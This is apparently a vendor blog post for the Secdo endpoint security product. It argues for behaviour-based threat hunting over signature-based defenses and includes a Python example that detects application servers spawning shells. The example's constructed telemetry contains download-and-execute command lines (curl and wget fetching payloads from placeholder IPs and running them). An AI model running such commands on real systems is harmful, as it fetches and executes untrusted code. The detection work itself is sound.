Security teams have spent the better part of the last decade deploying network security solutions that have proven, for the most part, reliable. We then make sure these technologies are tested, configured appropriately, and maintained as well as our budgets allow, weighing the risks of some decisions against the rewards of others.
What most fail to realize is that the target of these attacks isn’t the network. In reality, the network is just a strong outside gate that can be climbed or burrowed under, and in some cases broken through, but the real target is inside the house—the fine china, the silverware, the cash in the cookie jar—or in business, the endpoint and the confidential data it stores.
'New' Attacks Are Getting Us into Trouble
With all of the time spent managing our network security, how much have we really dedicated to improving what happens when it is circumvented? Our defenses are largely prevention based: firewalls, IPS/IDS, NAC, AV and the like stop roughly 90%-97% of attempts to gain entry. Isn't the remaining 3%-10%, then, what matters most? How do we detect and protect against threats that are unknown to the industry, to the technology, and to its users?
These are important questions to ask. They are important because the 'new' attacks are the ones getting us into trouble (think, for example, of the Apache Struts vulnerability blamed for the Equifax breach). That flaw had been publicly disclosed and patched months before the breach, but it was still unpatched on the affected system; coupled with other failures, it led to the exposure of data on some 143 million U.S. consumers. This is an endpoint problem on many levels.
Three to ten percent may sound small, but the Equifax, Anthem, Yahoo! and, not to forget, Target breaches show that it is not small enough to overlook. In fact, this slice of unknown exploits, vulnerabilities and threat vectors is the most important blind spot security teams need to address.
There are solutions dedicated to closing these blind spots, which differ in every network, by detecting the unknown through attack behaviors and empowering security teams to manage, react and adapt to a changing threat landscape. The problem is that we have all bought into the 'fence and alarm' approach rather than investing in deeper layers of security and in the needs of the practitioners who run them. We need to outfit ourselves with the right security tools to keep analog and digital burglars from taking anything that belongs to us.
What can be done today?
Secdo was architected to provide a deeper level of security, creating an adaptive security model that closes the gaps in existing defenses and addresses the day-to-day struggles of security operations. How?
Reduce the burden:
Security teams are inundated with hundreds of alerts per day from network security tools such as SIEMs and firewalls. Because of the time required to assess each alert, only a small percentage can be reviewed per day. Secdo augments these tools by automatically investigating and re-prioritizing every security alert, giving analysts a complete picture of the attack (timeline, root cause, scope, reputation and other context) in seconds rather than hours, and multiplying the number of alerts handled per day by 10-100x.
Respond and Adapt:
Armed with this forensic detail, security teams can take action with over 50 surgical and enterprise-wide response tools, ensuring that any external or insider threat can be neutralized. Secdo also learns from the threat, using the attack behaviors it discovered to continually optimize its AI engine and automate the defense against similar threats in the future.
Close the Gaps:
Recognizing that blind spots are the greatest risk to the security of any enterprise, Secdo monitors endpoints at the thread level, recording every activity for over 100 days; that record is the basis of both the automated investigations and the hunting for unknown threats. Unknown threats are discovered by attack methodology rather than by signatures, a fast but advanced form of threat hunting that does not suffer the weakness of traditional approaches: a signature has to exist before it can match anything, whereas a behavior such as a web server spawning a shell is suspicious whatever the payload is called. Once the security team finds an open attack vector, Secdo can automatically investigate the threat and hunt for the same activity elsewhere, preventing repeat incidents and steadily reducing the attack surface.
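The two ideas above, investigating an alert back to its root cause and timeline, and hunting by methodology instead of by signature, are easy to show in a few lines. The following is an added illustration written for this page; it is not Secdo's code and does not represent how Secdo's engine works. It runs over constructed process-creation events of the kind an endpoint agent records (hosts, pids, paths and the 203.0.113.0/24 and 198.51.100.0/24 addresses are all invented for the example), walks each event's parent chain, and flags the post-exploitation pattern seen in the Struts case: an application server spawning a shell that fetches and runs a payload. Nothing in it keys on a file name, hash or address, so the second host is caught even though it shares no indicator with the first.

```python
"""Behaviour-based hunting over endpoint process telemetry.

Added example, not code from Secdo or any product. It flags attack methodology
(an application server spawning a shell, which then downloads or runs a payload)
rather than matching a hash or signature, and groups everything descended from
the exploited server process into one finding with root cause and timeline.
All events, hosts, paths and addresses below are constructed for the example.
"""

SERVER_IMAGES = {"/usr/bin/java", "/usr/sbin/httpd", "/usr/sbin/nginx", "/usr/sbin/php-fpm"}
SHELL_IMAGES = {"/bin/sh", "/bin/bash", "/bin/dash"}
DOWNLOADER_IMAGES = {"/usr/bin/curl", "/usr/bin/wget"}
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Constructed sample telemetry: process-creation events as an endpoint agent might
# record them (timestamp, host, pid, parent pid, image path, command line).
EVENTS = [
    # web01: a Java app server is exploited and spawns shells (the Struts-style pattern)
    {"ts": "2017-05-13T10:01:02Z", "host": "web01", "pid": 4120, "ppid": 1, "image": "/usr/bin/java", "cmd": "java -jar app.war"},
    {"ts": "2017-05-13T10:07:45Z", "host": "web01", "pid": 4333, "ppid": 4120, "image": "/bin/sh", "cmd": "sh -c whoami"},
    {"ts": "2017-05-13T10:07:46Z", "host": "web01", "pid": 4334, "ppid": 4333, "image": "/usr/bin/whoami", "cmd": "whoami"},
    {"ts": "2017-05-13T10:09:10Z", "host": "web01", "pid": 4350, "ppid": 4120, "image": "/bin/bash", "cmd": "bash -c 'curl http://203.0.113.7/x -o /tmp/x; /tmp/x'"},
    {"ts": "2017-05-13T10:09:11Z", "host": "web01", "pid": 4351, "ppid": 4350, "image": "/usr/bin/curl", "cmd": "curl http://203.0.113.7/x -o /tmp/x"},
    {"ts": "2017-05-13T10:09:15Z", "host": "web01", "pid": 4352, "ppid": 4350, "image": "/tmp/x", "cmd": "/tmp/x"},
    # web01: an administrator's interactive shell runs curl too, but its parent is sshd (pid 900,
    # not in the telemetry), not the app server, so a behaviour rule keyed on ancestry ignores it
    {"ts": "2017-05-13T10:15:00Z", "host": "web01", "pid": 4400, "ppid": 900, "image": "/bin/bash", "cmd": "bash"},
    {"ts": "2017-05-13T10:15:05Z", "host": "web01", "pid": 4401, "ppid": 4400, "image": "/usr/bin/curl", "cmd": "curl https://example.org/"},
    # web02: the same methodology with a different tool, file name and address; no shared indicator
    {"ts": "2017-05-14T02:30:00Z", "host": "web02", "pid": 2210, "ppid": 1, "image": "/usr/bin/java", "cmd": "java -jar app.war"},
    {"ts": "2017-05-14T02:41:12Z", "host": "web02", "pid": 2480, "ppid": 2210, "image": "/bin/sh", "cmd": "sh -c 'wget http://198.51.100.9/k -O /dev/shm/k'"},
    {"ts": "2017-05-14T02:41:13Z", "host": "web02", "pid": 2481, "ppid": 2480, "image": "/usr/bin/wget", "cmd": "wget http://198.51.100.9/k -O /dev/shm/k"},
]


def ancestry(events_by_key, host, pid):
    """Walk parent links on one host and return the recorded chain, root first.
    Stops at the first parent the telemetry does not know about."""
    chain, seen, key = [], set(), (host, pid)
    while key in events_by_key and key not in seen:
        seen.add(key)
        ev = events_by_key[key]
        chain.append(ev)
        key = (host, ev["ppid"])
    chain.reverse()
    return chain


def behaviours(chain):
    """Name the techniques visible in a root-first chain. Every rule requires an
    application server as an ancestor, which is what separates the exploit from
    an admin doing the same thing by hand."""
    images = [e["image"] for e in chain]
    server_idx = [i for i, img in enumerate(images) if img in SERVER_IMAGES]
    if not server_idx:
        return []
    after = images[server_idx[0] + 1:]          # processes descended from the server
    found = []
    if any(img in SHELL_IMAGES for img in after):
        found.append("server_spawned_shell")
    if any(img in DOWNLOADER_IMAGES for img in after):
        found.append("server_descendant_downloads")
    if any(img.startswith(SCRATCH_DIRS) for img in after):
        found.append("server_descendant_runs_from_scratch_dir")
    return found


def hunt(events):
    """One finding per compromised server process: root cause, the set of
    techniques observed, and the ordered timeline of everything descended from it."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    incidents = {}
    for ev in events:
        chain = ancestry(by_key, ev["host"], ev["pid"])
        techs = behaviours(chain)
        if not techs:
            continue
        root = chain[0]
        inc = incidents.setdefault((root["host"], root["pid"]), {
            "host": root["host"], "root_cause": root["cmd"], "techniques": set(), "timeline": []})
        inc["techniques"].update(techs)
        inc["timeline"].append((ev["ts"], ev["pid"], ev["cmd"]))
    for inc in incidents.values():
        inc["timeline"].sort()
        inc["techniques"] = sorted(inc["techniques"])
    return list(incidents.values())


def hunt_same_methodology(findings, required):
    """Hunt by behaviour: hosts whose findings exhibit every technique in `required`,
    regardless of which binary, path or address was involved."""
    need = set(required)
    return [f["host"] for f in findings if need <= set(f["techniques"])]


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["host"], f["root_cause"], f["techniques"])
        for ts, pid, cmd in f["timeline"]:
            print("   ", ts, pid, cmd)
    print("hosts with server->shell->download:",
          hunt_same_methodology(hunt(EVENTS), ["server_spawned_shell", "server_descendant_downloads"]))
```

The rules are deliberately coarse; in practice the server image list and the scratch directories come from your own estate, and a match is a starting point for the investigation rather than a verdict. The point is the shape of the query: ancestry plus behaviour, which the 100-day record described above is what makes answerable.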
So yes, your gates and alarms are a great start, but with Secdo you have the equivalent of 24/7 surveillance cameras, traps, and automated defenses that can be used to protect your network and data, or your collection of 1980s GI Joe figurines and Weird Al records. Because that's worth something, somewhere ... right?